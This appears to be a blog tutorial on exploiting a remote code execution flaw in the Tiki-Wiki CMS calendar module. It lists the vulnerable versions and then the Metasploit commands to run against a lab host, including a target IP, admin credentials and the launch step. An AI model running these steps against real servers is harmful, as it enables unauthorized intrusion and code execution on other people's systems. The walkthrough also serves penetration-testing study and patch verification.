Exploit Remote Server using Tiki-Wiki CMS Calendar Command Execution

at 5:59 AM Saturday, July 9, 2016
Tiki-Wiki CMS's calendar module contains a remote code execution vulnerability within the viewmode GET parameter. The calendar module is NOT enabled by default. If enabled, the default permissions are set to NOT allow anonymous users to access. Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14 Verified/Tested against 14.1

Exploit Targets
tiki-wiki 14.1

Requirement
Attacker: kali Linux
Victim PC: Linux,Windows


Open Kali terminal type msfconsole


Now type use exploit/linux/http/tiki_calendar-exec
msf exploit (tiki_calendar-exec)>set targeturi /tiki
msf exploit (tiki_calendar-exec)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (tiki_calendar-exec)>set username admin
msf exploit (tiki_calendar-exec)>set password raj123
msf exploit (tiki_calendar-exec)>set rport 81
msf exploit (tiki_calendar-exec)>exploit          

Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)